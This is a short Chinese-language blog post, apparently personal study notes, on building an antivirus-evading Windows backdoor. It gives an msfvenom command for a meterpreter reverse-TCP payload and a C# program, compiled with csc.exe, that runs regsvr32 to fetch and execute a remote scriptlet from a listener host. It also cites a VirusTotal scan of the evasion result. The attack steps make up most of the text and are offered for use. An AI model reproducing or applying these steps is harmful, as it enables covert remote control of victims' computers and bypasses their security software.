exe文件,后門免殺的制作學(xué)習(xí)筆記

引用原文??!

注:本文技術(shù)非原創(chuàng),轉(zhuǎn)載請(qǐng)直接對(duì)原文轉(zhuǎn)載,請(qǐng)不要對(duì)本文打賞等,本文為學(xué)習(xí)筆記,禁止由本文產(chǎn)生任何盈利行為。

需要(Framework),一般Windows環(huán)境都有,
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=5555 X > shell.exe

kali下生成后門文件。直接查殺,發(fā)現(xiàn)很多報(bào)毒。
原文要求生成一個(gè)sct文件,然后放到你的web服務(wù)的目錄中,實(shí)現(xiàn)監(jiān)聽。

制作后門文件:
1、cmd必須給與管理員權(quán)限
2、cmd下,

cd C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\
C:\Windows\Microsoft.NET\Framework\v2.0.50727>csc /t:exe /out:aaa.exe regsvr32.cs

/t:exe意思是,輸出exe文件。
/out:aaa.exe意思是,輸出名字叫aaa的exe文件。
regsvr32.cs就是我們利用做免殺的c#文件。
https://github.com/pasahitz/regsvr32
regsvr32.cs這個(gè)文件需要單獨(dú)編輯

using System;
using System.Runtime.InteropServices;

namespace Regsvr

{ public class CMD
    { [DllImport("msvcrt.dll")]
        public static extern int system(string cmd);
        public static void Main()
        { system("regsvr32 /s /n /u /i:http://監(jiān)聽者IP:監(jiān)聽的端口/你剛才生成的sct文件 scrobj.dll");
        }}}

免殺后殺毒報(bào)告:https://www.virustotal.com/zh-cn/file/4f5801be2516cc8cfe4a73d00d44ca399c5bc116e9ac0d7f9f7a9aa29dca6f65/analysis/1495456458/

Malwarebytes這個(gè)殺毒軟件好強(qiáng)悍。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 個(gè)人學(xué)習(xí)批處理的初衷來源于實(shí)際工作;在某個(gè)迭代版本有個(gè)BS(安卓手游模擬器)大需求,從而在測(cè)試過程中就重復(fù)涉及到...
    Luckykailiu閱讀 4,990評(píng)論 0 11
  • dos 批處理 一:windows的命令行模式(win+R)在里面寫CMD就可以進(jìn)入windows的命令行模式了二...
    chenchao981閱讀 844評(píng)論 0 6
  • 引言 這篇文章介紹Windows下NTFS文件系統(tǒng)的ADS(alternate data streams,交換數(shù)據(jù)...
    查無此人asdasd閱讀 3,455評(píng)論 0 0
  • 香香不知何許人也,亦不詳其繆字,公司有女主播,因以為號(hào)焉 。閑靜少言,不慕榮利。好做號(hào),不求掃雷;每有廣告,便欣然...
    綻放的黑玫瑰閱讀 222評(píng)論 0 1
  • 1 18歲那一年,你剛剛拿到大學(xué)的錄取通知書,你笑的很甜,寒窗苦讀12年,你終于完成18歲之前最重要的目標(biāo)。那一天...
    沿海小生閱讀 1,449評(píng)論 5 29

友情鏈接更多精彩內(nèi)容